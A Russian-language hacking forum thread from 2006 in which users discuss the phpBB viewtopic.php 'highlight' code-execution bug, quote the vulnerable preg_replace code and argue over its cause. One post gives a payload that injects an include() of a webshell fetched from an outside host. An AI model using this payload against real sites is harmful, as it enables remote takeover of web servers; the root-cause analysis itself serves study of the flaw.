ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

08.01.2006, 03:13
|
|
Познающий
Регистрация: 23.11.2005
Сообщений: 84
Провел на форуме: 299584
Репутация:
4
|
|
dron-anarchy ты про чо???
а ешё один вопрос сплоит рабочий или его нухно дароботать тоесть исправеть
Последний раз редактировалось Dark Angel; 08.01.2006 в 03:43..
|
|
|

09.01.2006, 08:51
|
|
Отец порядка
Регистрация: 04.03.2005
Сообщений: 1,007
Провел на форуме: 1204641
Репутация:
412
|
|
а ешё один вопрос сплоит рабочий или его нухно дароботать тоесть исправеть
Дык..вроде рабочий. а ты не пытался его запустиить?=))))
|
|
|

10.01.2006, 20:54
|
|
Пачка маргарина
Регистрация: 14.07.2005
Сообщений: 964
Провел на форуме: 4646474
Репутация:
1424
|
|
Бу
вот ребята а что вы будете делать если на php safe mode, и нельзя команды выполнять? вот чтоб подобных траблов не было, проще сразу проинклудить вебшел. Так как видно что бага представляет собой php injection, делаем типа так:
....&highlight=%2527.include(\$_GET[qqq]).%2527&qqq=http://blablabla.narod.ru/shell.php?
|
|
|

11.01.2006, 00:46
|
|
Постоянный
Регистрация: 20.01.2005
Сообщений: 899
Провел на форуме: 1535446
Репутация:
182
|
|
Так как видно что бага представляет собой php injection, делаем типа так:
Если поднятся выше,то баг-mysql-inj а уже с помощью mysql-inj получает выполнение пхп скриптов +)
|
|
|

11.01.2006, 00:56
|
|
Пачка маргарина
Регистрация: 14.07.2005
Сообщений: 964
Провел на форуме: 4646474
Репутация:
1424
|
|
Сообщение от qBiN
Если поднятся выше,то баг-mysql-inj а уже с помощью mysql-inj получает выполнение пхп скриптов +)
mysql-inj это как? если не ошибаюсь то баг там в хреновом использовании preg_replace() ++)
|
|
|

11.01.2006, 01:03
|
|
Banned
Регистрация: 20.06.2005
Сообщений: 880
Провел на форуме: 4610226
Репутация:
1332
|
|
а я ниче непонял=))) qBiN да если у него и так команды выполняются то нах скуль ему тем более как mysql позволит выполнить пхп команды??=)) и во-вторых бага там в хреновом использовании eval() =)))
|
|
|

11.01.2006, 01:24
|
|
Пачка маргарина
Регистрация: 14.07.2005
Сообщений: 964
Провел на форуме: 4646474
Репутация:
1424
|
|
Сообщение от ZaCo
и во-вторых бага там в хреновом использовании eval() =)))
вот сейчас специально для вас двоих- zaco и qbin, потрудился нашел старую версию phpbb , и вот представляю вам на обозрение тот самый уязвимый код из файла viewtopic.php:
PHP код:
$highlight_match = $highlight = ''; if (isset($HTTP_GET_VARS['highlight'])) { // Split words and phrases $words = explode(' ', trim(htmlspecialchars(urldecode($HTTP_GET_VARS['highlight']))));
for($i = 0; $i < sizeof($words); $i++) { if (trim($words[$i]) != '') { $highlight_match .= (($highlight_match != '') ? '|' : '') . str_replace('*', '\w*', $words[$i]); } } unset($words);
$highlight = urlencode($HTTP_GET_VARS['highlight']); }
PHP код:
if ($highlight_match) { // This was shamelessly 'borrowed' from volker at multiartstudio dot de // via php.net's annotated manual $message = str_replace('\"', '"', substr(preg_replace('#(\>(((?>([^><]+|(?R)))*)\<))#se', "preg_replace('#\b(" . $highlight_match . ")\b#i', '<span style=\"color:#" . $theme['fontcolor3'] . "\"><b>\\\\1</b></span>', '\\0')", '>' . $message . '<'), 1, -1)); }
теперьто вы мне поверите?
Последний раз редактировалось ShAnKaR; 11.01.2006 в 01:38..
|
|
|

11.01.2006, 01:35
|
|
Banned
Регистрация: 20.06.2005
Сообщений: 880
Провел на форуме: 4610226
Репутация:
1332
|
|
нене ты думаешь как код выполняется? прег репласе - первая ошибка... а там уже в eval выполняется, ну эт конечно правильно если бы регулярные выражения грамматно настроили то все было бы безопасно+)))... просто имхо eval вообще опасная штука=)
|
|
|

11.01.2006, 01:59
|
|
Пачка маргарина
Регистрация: 14.07.2005
Сообщений: 964
Провел на форуме: 4646474
Репутация:
1424
|
|
Сообщение от ZaCo
нене ты думаешь как код выполняется?
я не думаю , я знаю- preg_replace с модификатором e
|
|
|

11.01.2006, 11:08
|
|
Постоянный
Регистрация: 20.01.2005
Сообщений: 899
Провел на форуме: 1535446
Репутация:
182
|
|
mysql-inj это как? если не ошибаюсь то баг там в хреновом использовании preg_replace() ++)
Просто я подумал о том что используется двойное кодирование апострофа-%2527 :-)
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|